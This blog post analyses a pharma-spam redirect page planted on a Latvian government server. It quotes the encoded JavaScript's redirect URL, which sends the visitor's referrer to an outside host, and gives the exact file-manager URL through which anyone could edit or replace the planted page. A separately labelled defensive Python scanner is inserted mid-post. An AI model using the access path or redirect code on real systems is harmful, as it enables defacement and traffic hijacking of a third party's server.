Blackhat SEO and hacking

If you are like me, you probably track a couple of pharma-related queries on Google to understand more about the blackhat SEO strategies that are really working. I came across this article in French where the author, a French blackhat, explains a discovery he made while looking at the Google results for a Viagra-related query.

This webpage (http://sf.lm.gov.lv/CMS/modules/EReditor/jscripts/tiny_mce/plugins/filemanager/files/esf/in/buycheapviagraonlineukwr.htm) is on one of the web servers of the government of Latvia and was definitely not put there by government officials. If you visited this URL from Google, you were redirected to a pharma affiliate site. If you visited this URL directly, you were redirected to a porn site. The redirection is done with encoded JavaScript, as usual. Once he decoded the JavaScript, we can see that the redirection is made using this URL (the code is in the original article if you want to see it):

http://www.finance-leaders.com/feed2.php?keyword="+ escape("188")+"&feed=8&ref="+ escape(document.referrer))
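A defensive check for the pattern described above, as an added example that is not code from the original article or from this post: it scans HTML (for instance, files found in a CMS upload directory) for scripts that, once `unescape()` layers are decoded, read `document.referrer` and also write or redirect. The sample pages and the host `redirector.example` are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed samples; redirector.example is a placeholder host, not from the post.
SAMPLE_SPAM = (
    "<html><body><h1>buy cheap pills online</h1><script>"
    "document.write(unescape('%3Cscript%20src%3D%22http%3A//redirector.example/"
    "feed.php%3Fref%3D%22%2Bescape%28document%2Ereferrer%29%3E%3C/script%3E'));"
    "</script></body></html>"
)
SAMPLE_CLEAN = "<html><body><script>var y = new Date().getFullYear();</script></body></html>"

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.I | re.S)
REFERRER_RE = re.compile(r"document\.referrer", re.I)
SINK_RE = re.compile(r"location\b|document\.write|<script[^>]+src\s*=", re.I)
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def decode_layers(js, max_depth=5):
    """Expand unescape('...') literals; return (decoded_js, layers_removed)."""
    layers = 0
    while layers < max_depth:
        js, n = UNESCAPE_RE.subn(lambda m: unquote(m.group(2)), js)
        if n == 0:
            break
        layers += 1
    return js, layers


def scan_html(html):
    """Flag scripts that read the referrer and also write or redirect."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        raw = m.group(1)
        decoded, layers = decode_layers(raw)
        if REFERRER_RE.search(decoded) and SINK_RE.search(decoded):
            findings.append({
                "layers": layers,
                # True when the referrer check only shows up after decoding
                "hidden": not REFERRER_RE.search(raw),
                "hosts": sorted(set(h.lower() for h in HOST_RE.findall(decoded))),
            })
    return findings


if __name__ == "__main__":
    for name, page in (("spam", SAMPLE_SPAM), ("clean", SAMPLE_CLEAN)):
        print(name, scan_html(page))
```

A finding with `hidden` set means the referrer logic was invisible in the raw file, which is the same property that lets a search engine index the keyword text without seeing the redirect.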

The website http://sf.lm.gov.lv/ has a security problem that anyone can exploit right now.

The important point is that anyone can modify the JavaScript to redirect the traffic to the page they want. (There is no point in doing that now: first, it's illegal, and second, the page isn't indexed in Google anymore.)

All you have to do is go to

http://sf.lm.gov.lv/CMS/modules/EReditor/jscripts/tiny_mce/plugins/filemanager/frameset.php?a=b&js=mcFileManager.insertFileToForm&url=/CMS/modules/EReditor/jscripts/tiny_mce/plugins/filemanager/files/esf/in/buycheapviagraonlineukwr.htm&initial_path=mce_clear&initial_rootpath=mce_clear&remember=true

and then go into the sub-directory /esf/in, where the page buycheapviagraonlineukwr.htm is. You can edit it, delete it, or replace it with whatever you want (so basically changing the redirect to your own affiliate account). Google isn't able to understand the encoded JavaScript but sees the keyword-filled page.

Something the original article doesn't talk about is how the blackhat who made that page built links to it.

What we can learn using Yahoo is that the number of links pointing to the page is very low and that it was link-built using the usual blackhat pattern of spamming guestbooks and forums. But what is weirder is that the domain has been link-built by the blackhats, according to Yahoo linkdomain. And looking at those URLs, you can find plenty of vulnerable web servers that are used to spam the hell out of the search engines.

And because the blackhat cannot protect his work (sure, he hacked those web servers and cannot patch them), anyone can go and switch the affiliate code. By the way, this page was 11th on one of the biggest keywords.

2008 is the year when blackhat SEO met hacking on a larger scale. This is just one proof of it.
